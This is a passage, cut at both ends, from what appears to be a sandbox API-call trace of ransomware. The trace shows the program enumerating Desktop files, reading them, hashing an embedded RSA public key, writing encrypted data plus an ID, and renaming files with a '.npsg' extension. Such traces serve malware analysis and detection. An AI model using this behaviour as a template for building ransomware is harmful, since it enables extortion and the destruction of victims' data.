lpNumberOfBytesWritten=0x39afb14*=0x9acc, lpOverlapped=0x0) returned 1 [0236.312] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7fcd0 | out: hHeap=0x620000) returned 1 [0236.312] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x9ad1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.312] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.312] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0236.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7cbd8 [0236.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b7a060 [0236.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b7a060, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0236.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b947f8 [0236.312] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a060 | out: hHeap=0x620000) returned 1 [0236.312] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7cbd8 | out: hHeap=0x620000) returned 1 [0236.312] WriteFile (in: hFile=0x644, lpBuffer=0x3b947f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b947f8*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0236.313] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0236.313] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.313] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.313] CloseHandle (hObject=0x644) returned 1 [0236.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0236.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x3b8f7a8 [0236.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a7f8 | out: hHeap=0x620000) returned 1 [0236.316] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\neTGSd9Wavz2PccQ.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\netgsd9wavz2pccq.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\neTGSd9Wavz2PccQ.bmp.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\netgsd9wavz2pccq.bmp.npsg")) returned 1 [0236.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f7a8 | out: hHeap=0x620000) returned 1 [0236.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.317] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a440 | out: hHeap=0x620000) returned 1 [0236.319] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30dbde80, ftCreationTime.dwHighDateTime=0x1d5c075, ftLastAccessTime.dwLowDateTime=0x23831200, ftLastAccessTime.dwHighDateTime=0x1d5b740, ftLastWriteTime.dwLowDateTime=0x23831200, ftLastWriteTime.dwHighDateTime=0x1d5b740, nFileSizeHigh=0x0, nFileSizeLow=0x141a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nPWhBQN.png", cAlternateFileName="")) returned 1 [0236.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0236.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x68a920 [0236.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0236.319] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nPWhBQN.png") returned=".png" [0236.319] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nPWhBQN.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\npwhbqn.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.319] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=5146) returned 1 [0236.319] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.322] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x13f4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.322] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.323] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.323] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.323] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.323] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x141a, lpOverlapped=0x0) returned 1 [0236.324] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.324] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0236.324] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.324] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.324] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a440) returned 1 [0236.325] CryptCreateHash (in: hProv=0x67a440, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.325] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.325] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0236.325] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.325] GetLastError () returned 0x0 [0236.325] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.325] CryptReleaseContext (hProv=0x67a440, dwFlags=0x0) returned 1 [0236.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.325] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.325] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.325] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1420) returned 0x3b7fcd0 [0236.326] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0236.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0236.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0236.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0236.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b95110 [0236.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400098 [0236.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b95158 [0236.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34000b0 [0236.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34000e0 [0236.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400140 [0236.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34000f8 [0236.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0236.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b8d7c0 [0236.326] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0236.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b8f7a8 [0236.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000e0 | out: hHeap=0x620000) returned 1 [0236.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000f8 | out: hHeap=0x620000) returned 1 [0236.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400140 | out: hHeap=0x620000) returned 1 [0236.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0236.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f7a8 | out: hHeap=0x620000) returned 1 [0236.327] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400140 [0236.327] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0236.327] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34000f8 [0236.327] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0236.327] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x34000e0 [0236.327] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0236.327] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b830 [0236.327] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0236.327] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0236.327] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0236.327] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7bb78 [0236.327] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0236.327] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0236.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0236.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000f8 | out: hHeap=0x620000) returned 1 [0236.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000e0 | out: hHeap=0x620000) returned 1 [0236.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0236.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400140 | out: hHeap=0x620000) returned 1 [0236.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0236.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0236.328] GetCurrentThreadId () returned 0x5b4 [0236.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0236.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x6886c0 [0236.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0236.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a440 [0236.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0236.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0236.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0236.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0236.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.328] GetCurrentThreadId () returned 0x5b4 [0236.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0236.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0236.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c52a8 [0236.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0236.329] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0236.329] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400140 [0236.330] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0236.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0236.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0236.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0236.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0236.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34000e0 [0236.330] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0236.330] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0236.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0236.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0236.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34000f8 [0236.330] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0236.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0236.330] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0236.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34000c8 [0236.330] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0236.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400158 [0236.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0236.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0236.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400128 [0236.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400110 [0236.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400170 [0236.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400110 | out: hHeap=0x620000) returned 1 [0236.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400110 [0236.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400128 | out: hHeap=0x620000) returned 1 [0236.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0236.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0236.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0236.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000e0 | out: hHeap=0x620000) returned 1 [0236.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34000e0 [0236.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0236.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400140 | out: hHeap=0x620000) returned 1 [0236.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b830 [0236.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400170 | out: hHeap=0x620000) returned 1 [0236.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x346fd28 [0236.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b948 [0236.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0236.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0236.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000e0 | out: hHeap=0x620000) returned 1 [0236.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b7a060 [0236.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0236.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0236.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a440 | out: hHeap=0x620000) returned 1 [0236.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0236.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0236.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0236.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fd28 | out: hHeap=0x620000) returned 1 [0236.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a060 | out: hHeap=0x620000) returned 1 [0236.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0236.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0236.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400110 | out: hHeap=0x620000) returned 1 [0236.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0236.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400158 | out: hHeap=0x620000) returned 1 [0236.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0236.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000f8 | out: hHeap=0x620000) returned 1 [0236.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000c8 | out: hHeap=0x620000) returned 1 [0236.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0236.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0236.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0236.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000b0 | out: hHeap=0x620000) returned 1 [0236.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95158 | out: hHeap=0x620000) returned 1 [0236.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0236.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0236.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0236.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: 